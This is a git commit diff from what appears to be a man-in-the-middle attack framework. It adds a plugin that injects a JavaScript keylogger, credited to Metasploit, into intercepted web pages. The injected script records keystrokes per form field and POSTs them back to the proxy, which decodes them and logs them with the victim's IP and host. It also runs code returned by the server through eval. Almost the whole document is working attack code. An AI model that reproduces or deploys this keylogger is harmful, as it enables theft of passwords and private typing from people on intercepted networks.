WPAD Poisoner back online, removed options in config file and rellative code for choosing which DNS server to use. (there really was not point in keeping it)

the --basic and --force options and the EXE serving in the Responder plugin have been removed, until I can find a better way of implementing them. Modified and re-added the JS-keylogger and SMBauth plugins
2025-07-06 21:12:16 -07:00 · 2015-05-04 23:13:21 +02:00 · 2015-05-04 23:13:21 +02:00 · 5d07551a50
commit 5d07551a50
parent aa4e022ab0
13 changed files with 312 additions and 165 deletions
--- a/plugins/JsKeylogger.py
+++ b/plugins/JsKeylogger.py
@ -0,0 +1,167 @@
+#!/usr/bin/env python2.7
+
+# Copyright (c) 2014-2016 Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+from plugins.plugin import Plugin
+from plugins.Inject import Inject
+import logging
+
+class jskeylogger(Inject, Plugin):
+    name       = "Javascript Keylogger"
+    optname    = "jskeylogger"
+    desc       = "Injects a javascript keylogger into clients webpages"
+    implements = ["handleResponse", "handleHeader", "connectionMade", "sendPostData"]
+    depends    = ["Inject"]
+    version    = "0.2"
+    has_opts   = False
+
+    def initialize(self, options):
+        Inject.initialize(self, options)
+        self.html_payload = self.msf_keylogger()
+
+    def sendPostData(self, request):
+        #Handle the plugin output
+        if 'keylog' in request.uri:
+
+            raw_keys = request.postData.split("&&")[0]
+            keys = raw_keys.split(",")
+            del keys[0]; del(keys[len(keys)-1])
+
+            input_field = request.postData.split("&&")[1]            
+
+            nice = ''
+            for n in keys:
+                if n == '9':
+                    nice += "<TAB>"
+                elif n == '8':
+                    nice = nice.replace(nice[-1:], "")
+                elif n == '13':
+                    nice = ''
+                else:
+                    try:
+                        nice += n.decode('hex')
+                    except:
+                        mitmf_logger.warning("%s ERROR decoding char: %s" % (request.client.getClientIP(), n))
+
+            #try:
+            #     input_field = input_field.decode('hex')
+            #except:
+            #    mitmf_logger.warning("%s ERROR decoding input field name: %s" % (request.client.getClientIP(), input_field))
+            
+            mitmf_logger.warning("%s [%s] Field: %s Keys: %s" % (request.client.getClientIP(), request.headers['host'], input_field, nice))
+
+    def msf_keylogger(self):
+        #Stolen from the Metasploit module http_javascript_keylogger
+
+        payload = """<script type="text/javascript">
+window.onload = function mainfunc(){
+var2 = ",";
+name = '';
+function make_xhr(){
+    var xhr;
+            try {
+                xhr = new XMLHttpRequest();
+            } catch(e) {
+                try {
+                    xhr = new ActiveXObject("Microsoft.XMLHTTP");
+                } catch(e) {
+                    xhr = new ActiveXObject("MSXML2.ServerXMLHTTP");
+                }
+            }
+            if(!xhr) {
+                throw "failed to create XMLHttpRequest";
+            }
+            return xhr;
+        }
+        
+        xhr = make_xhr();
+        xhr.onreadystatechange = function() {
+            if(xhr.readyState == 4 && (xhr.status == 200 || xhr.status == 304)) {
+                eval(xhr.responseText);
+            }
+        }
+
+if (window.addEventListener) {
+document.addEventListener('keypress', function2, true);
+document.addEventListener('keydown', function1, true);
+} else if (window.attachEvent) {
+document.attachEvent('onkeypress', function2);
+document.attachEvent('onkeydown', function1);
+} else {
+document.onkeypress = function2;
+document.onkeydown = function1;
+}
+
+}
+
+function function2(e)
+{
+    srcname = window.event.srcElement.name;
+    var3 = (window.event) ? window.event.keyCode : e.which;
+    var3 = var3.toString(16);
+    
+    if (var3 != "d")
+    {
+        andxhr(var3, srcname);
+    }
+}
+
+function function1(e)
+{
+    srcname = window.event.srcElement.name;
+    id = window.event.srcElement.id;
+
+    var3 = (window.event) ? window.event.keyCode : e.which;
+    if (var3 == 9 || var3 == 8 || var3 == 13)
+    {
+        andxhr(var3, srcname);
+    }
+    else if (var3 == 0)
+    {
+        
+        text = document.getElementById(id).value;
+        if (text.length != 0)
+        {   
+            andxhr(text.toString(16), srcname);
+        }
+    } 
+}
+
+function andxhr(key, inputName)
+{   
+    if (inputName != name)
+    {
+        name = inputName;
+        var2 = ",";
+    }
+
+    var2= var2 + key + ",";
+
+    xhr.open("POST", "keylog", true);
+    xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
+    xhr.send(var2 + '&&' + inputName);
+    
+    if (key == 13 || var2.length > 3000)
+    {
+        var2 = ",";
+    }
+}
+</script>"""
+
+        return payload